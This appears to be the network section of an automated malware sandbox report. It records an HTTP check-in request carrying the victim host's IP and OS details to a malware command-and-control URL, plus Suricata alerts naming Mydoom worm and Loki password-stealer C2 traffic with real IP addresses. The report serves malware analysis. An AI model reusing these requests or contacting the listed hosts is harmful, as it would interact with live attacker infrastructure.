Network Analysis
| IP Address | Status | Action | VT | Location |
|---|---|---|---|---|
| No hosts contacted. | ||||
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
No traffic
No traffic
GET
0
http://epsaphpaaa.ws/imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS
REQUEST
RESPONSE
BODY
GET /imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS HTTP/1.1
Host: epsaphpaaa.ws
User-Agent: explwer
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.168.209:49273 -> 64.70.19.203:80 | 2807186 | ETPRO MALWARE Worm.Mydoom Checkin | Malware Command and Control Activity Detected |
| TCP 192.168.168.209:49273 -> 64.70.19.203:80 | 2807187 | ETPRO MALWARE User-Agent (explwer) | A Network Trojan was detected |
| TCP 192.168.168.209:49275 -> 35.164.78.200:80 | 91379183 | ThreatFox Loki Password Stealer (PWS) botnet C2 traffic (ip:port - confidence level: 75%) | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts
